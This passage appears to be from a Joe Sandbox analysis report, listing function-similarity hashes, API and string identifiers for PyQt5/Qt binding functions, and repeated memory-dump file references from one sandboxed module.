                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68b8db9e18bc0a87ffa48f4b0ff0b1ba1b9fcb9a72ca79803255c5c48f2ee483
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25213EB5B09B46C1EB60CF25E89866933A8FB59B94FA440B6CE4D03724DF3CE549C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?sender@Object@@RestoreSave
                                                                                                                                                                                                                • String ID: QIntValidator$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 10903585-4223726384
                                                                                                                                                                                                                • Opcode ID: 5f70567fe0c24c26a62ca6895f4f0bf7e1c7748cf3356f83b1fc2d7e6237f61a
                                                                                                                                                                                                                • Instruction ID: 3f93d38bb52f24a0844cc905305dd73b31738f267a9e8489a67ad4f6cd6c34ad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f70567fe0c24c26a62ca6895f4f0bf7e1c7748cf3356f83b1fc2d7e6237f61a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA214CB5B08B4680EB60CF21E84866933A8FB9AB94F5440B2CE4D47320DF3CD149C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Point$F@@@@Vector@$?append@?$F@@@Polygon
                                                                                                                                                                                                                • String ID: QPolygonF$__getitem__
                                                                                                                                                                                                                • API String ID: 3069565249-1125083749
                                                                                                                                                                                                                • Opcode ID: da13391782f449ba148e81d7404c23b71cafb5acdeea17eb7d355e3f5dd026e4
                                                                                                                                                                                                                • Instruction ID: 4fa6c71520b607c150c0a3679ee35f73c7a586773806fdd0a0083f69f3c11a54
                                                                                                                                                                                                                • Opcode Fuzzy Hash: da13391782f449ba148e81d7404c23b71cafb5acdeea17eb7d355e3f5dd026e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9511F76B0CB9686EB508F25E48416A77A5FB89BC4F548176DE4D43B28DF3CE045CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ??_0Vector3$SubtypeType_V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2671363276-2407233842
                                                                                                                                                                                                                • Opcode ID: d63ec71e5b9591f32adac0eef95a3954b7f486ea87113df824d8fb0f32220d3b
                                                                                                                                                                                                                • Instruction ID: 811e8b3b6b7806c1bc378b95b7195451d8ce1938b0806bb61f7bfeec11584381
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d63ec71e5b9591f32adac0eef95a3954b7f486ea87113df824d8fb0f32220d3b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF413FA6A0CA5682EB609B66F844169B374FB89BD4F498072DF4D03B78DF7CD485D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Vector2$SubtypeType_V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2383268015-2407233842
                                                                                                                                                                                                                • Opcode ID: abafc35d9303f6d683e09387b14fb797e3e153cecf983f7f40c33f414fc87d77
                                                                                                                                                                                                                • Instruction ID: d203c049d8ecfc185f461692af2e110e99bcc0949121c7f725b7da66c1d9ad94
                                                                                                                                                                                                                • Opcode Fuzzy Hash: abafc35d9303f6d683e09387b14fb797e3e153cecf983f7f40c33f414fc87d77
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71412EA660CE5681EB609B66F844169B3B8FB89BD4F084072DE4D17B68DF7CE485C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Transform@@$SubtypeType_V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2489541258-2407233842
                                                                                                                                                                                                                • Opcode ID: 8af3d714492ba531aa15746caac70b04ab0781d1bbfeadf077fb0fe067feb4a2
                                                                                                                                                                                                                • Instruction ID: c036ee2de1bdd4cc572be45aa7b27d5dd495dd54b41372ab4deb6fe9a8c09bb4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8af3d714492ba531aa15746caac70b04ab0781d1bbfeadf077fb0fe067feb4a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8411BA6A0CA5681EB619F2AF844169B3B4FB89BD4F184472DF4D03B68DF7CD445D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ??_0Vector4$SubtypeType_V0@@
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2115489448-2407233842
                                                                                                                                                                                                                • Opcode ID: cbd49fbf05ff3dc5f3da5c49ad96ba42d4d616930bfedab7bff3a6bbd37fae6b
                                                                                                                                                                                                                • Instruction ID: 906bbd78f0a60098484f894e9ecff3f16b6f43ec25af1f8df85c9628b5c4aa10
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbd49fbf05ff3dc5f3da5c49ad96ba42d4d616930bfedab7bff3a6bbd37fae6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0413DB6A0CA5681EB609B66F85416AB374FB89BD4F084072DE4D03B68DF7CE485CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?parent@$Index@@ItemModelModel@@Object@@StandardV2@@
                                                                                                                                                                                                                • String ID: BJ9$QStandardItemModel$parent$parent(self, child: QModelIndex) -> QModelIndexparent(self) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 1065259071-183512387
                                                                                                                                                                                                                • Opcode ID: 125cd4ff7d0439f89bbbef2b21f20c6a3a68f52241ea6fd5e2709d8b66037e57
                                                                                                                                                                                                                • Instruction ID: a9773ad9f6fe88d7195d962eccc64adf1bda38b0b0cb88675b9a1becf6e21e73
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 125cd4ff7d0439f89bbbef2b21f20c6a3a68f52241ea6fd5e2709d8b66037e57
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB413AB2708B8685EB708B25E8443AA77A8FB96B84F548176DE8D47764DF3CD198C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A341F46
                                                                                                                                                                                                                • ?setProperty@QTextFormat@@QEAAXHAEBV?$QVector@VQTextLength@@@@@Z.QT5GUI ref: 00007FFB9A341FF8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?setFormat@@Property@$Length@@@@@Variant@@@Vector@
                                                                                                                                                                                                                • String ID: BiJ1$QTextFormat$setProperty$setProperty(self, propertyId: int, value: Any)setProperty(self, propertyId: int, lengths: Iterable[QTextLength])
                                                                                                                                                                                                                • API String ID: 7694866-1449459306
                                                                                                                                                                                                                • Opcode ID: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
                                                                                                                                                                                                                • Instruction ID: 53f26aa4f97ab49e24542331c9eb8de9e4e8701a3e577f263d9d617eed85af5d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4441F4B6A08B4689EB608F61E8842E937B8FB48B88F544176DE4C53728DF38E455C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFB9A329D21
